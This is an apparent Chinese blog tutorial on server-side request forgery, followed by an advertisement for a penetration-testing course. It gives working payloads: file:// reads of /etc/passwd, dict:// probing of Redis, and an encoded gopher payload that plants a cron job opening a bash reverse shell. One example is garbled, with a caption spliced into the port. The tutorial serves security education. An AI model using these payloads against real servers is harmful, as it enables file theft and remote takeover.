ssrf 服务器请求伪造

文章探讨了如何利用SSRF(Server-SideRequestForgery)漏洞进行内网穿透,原因是服务端未对目标URL进行有效过滤。主要漏洞场景包括分享、转码、翻译、图片处理等。举例说明了通过file、dict和gopher等协议读取内网资源,如文件、数据库信息,甚至可能反弹shell。这些利用方法揭示了服务器安全的重要性,需严格限制对外部资源的访问。
摘要由CSDN通过智能技术生成

目标

从外网无法访问的内部服务,可以利用ssrf来进行内网穿透
​

原因

由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制

一般漏洞存在的点

1,分享,通过url地址分享网页内容
2,转码服务:通过url地址把源地址的网页内容调优使其适应手机屏幕浏览
3,在线翻译:通过url地址翻译对应文本的内容。提供此功能的国内公司有百度,有道等
4,图片加载与下载:通过url地址加载或下载图片
5,图片,文章收藏功能
6,未公开的api实现以及其他调用url的功能
7,从url关键字中寻找 例如:share wap url link src source target u 3g display sourceURL imageURL domain

举例

例如网站要求输入要上传的图片地址时,输入内网Ip.例如:http://192.168.10.1:3306(3306是数据库的端口),这样可以进入内网数据库中
或者输入file:///D:/www.txt查看内网中D盘的ww.txt的文件
或者输入dict://192.168.64.144:3306/info
或者输入ftp://192.168.64.144:21

ssrf利用的协议

# file
在有回显的情况下,利用 file 协议可以读取任意内容
​
curl -vvv "http://target/ssrf.php?url=file:///etc/passwd"
使用file协议 file protocol (任意文件读取)
​
# dict
泄露安装软件版本信息,查看端口,操作内网redis服务等
​
curl -vvv "http://target/ssrf.php?url=dict://127.0.0.1:63使用dict协议 dict protocol (获取Redis配置信息)79/info"
​
​
# gopher
gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell
​
curl -vvv "http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1 %0d %0a $8%0d %0aflushall %0d %0a*3 %0d %0a $3%0d %0aset %0d %0a $1%0d %0a1 %0d %0a $64%0d %0a %0d %0a %0a %0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 %0a %0a %0a %0a %0a %0d %0a %0d %0a %0d %0a*4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $3%0d %0adir %0d %0a $16%0d %0a/var/spool/cron/ %0d %0a*4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $10%0d %0adbfilename %0d %0a $4%0d %0aroot %0d %0a*1 %0d %0a $4%0d %0asave %0d %0aquit %0d %0a"
使用gopher协议(俗称万能协议) gopher protocol (一键反弹Bash)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
程声明:该课程是教学使用,视频内涉及漏洞利用方法,请勿在互联网环境使用;维护互联网安全,人人有责。实验所需环境:vmware;kali虚拟机一台;windows server一台;有docker环境的Linux虚拟机环境下载地址在购买课程后单独发送 【课程配套资源】1、Python脚本(Margin老师自研,不光能学漏洞,还能学Python,实在是划算)2、与Margin老师实时互动3、免费的CISP-PTE考试技巧指导(Margin老师与CISP-PTE的负责人很熟的,非常多的一手消息^o^)4、Margin老师的内部直播可以优先参加5、Margin老师的课程基于CISP-PTE的知识体系进一步扩展,使课程内容更贴近实战   【课程主要解决问题】1、CSRF、SSRF搞不清楚?2、SSRF原理是什么?危害大小?如何利用SSRF获取主机权限?如果使用Python提高挖洞效率?3、Gopher协议、Dict协议?完全没听过啊,没关系,看完课程后你门清。4、SSRF渗透Redis数据库,Redis客户端和服务器端怎么通信?通信报文是怎么样的?看这里就行。5、SSRF渗透Struts2总是失败?不知道如何编码?不知道如何使用Gopher协议?来这里。6、SSRF表面简单,实则有无数坑,通过视频提高学习效率吧。 【CISP-PTE介绍】1、CISP-PTE是进入网络安全行业的TOP1认证,能帮你梳理完整的网络安全知识体系2、有PTE证书在网络安全公司是免技术笔试的,怎么样?是不是很棒。3、Margin老师的课程基于CISP-PTE的知识体系进一步扩展,使课程内容更贴近实战本课程属于CISP-PTE渗透测试工程师认证体系的课程,但内容更加丰富。CISP-PTE是国内第一个以动手实操为主的网络安全认证,该注册考试是为了锻炼考生世界解决网络安全问题的能力,持续增强我国的网络安全水平和防御能力,促进国内网络防御能力的不断提高。考试内容从多个层面进行,考点和网络安全动态相结合,真实的反应出真实的网络环境发现的各种问题。如果要考取CISP-PTE证书需要掌握以下内容:1、Web安全基础,注入漏洞、上传漏洞、跨站脚本漏洞、访问控制漏洞、会话管理漏洞哦等。2、间件的安全知识,如:Apache,IIS,Tomcat,以及 JAVA 开发的间件 Weblogic,Jboss, Websphere 等,且要了解间件加固方法,在攻与防的能力上不断提升。3、操作系统安全,包含Windows和Linux操作系统,从账户管理、文件系统权限、日志审计等方面讲解,了解常见的漏洞方式和加固方法。4、数据库安全,包含MSSQL、MYSQL、ORACLE、REDIS数据,了解常用的数据库漏洞和题全方法,保证数据库的安全性。 【关于Margin老师】· Margin/教育系统网络安全保障人员认证首批讲师/高级讲师· 擅长CTF/Web安全/渗透测试 /系统安全· 3年研发/擅长Java/Python/某银行现金循环机业务系统开发者· 曾参与开发网络安全认证教材· 知乎专栏/CISP-PTE渗透测试工程师学习· 4年线下网络安全讲师/2000+线下学员/100000+线上学员
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值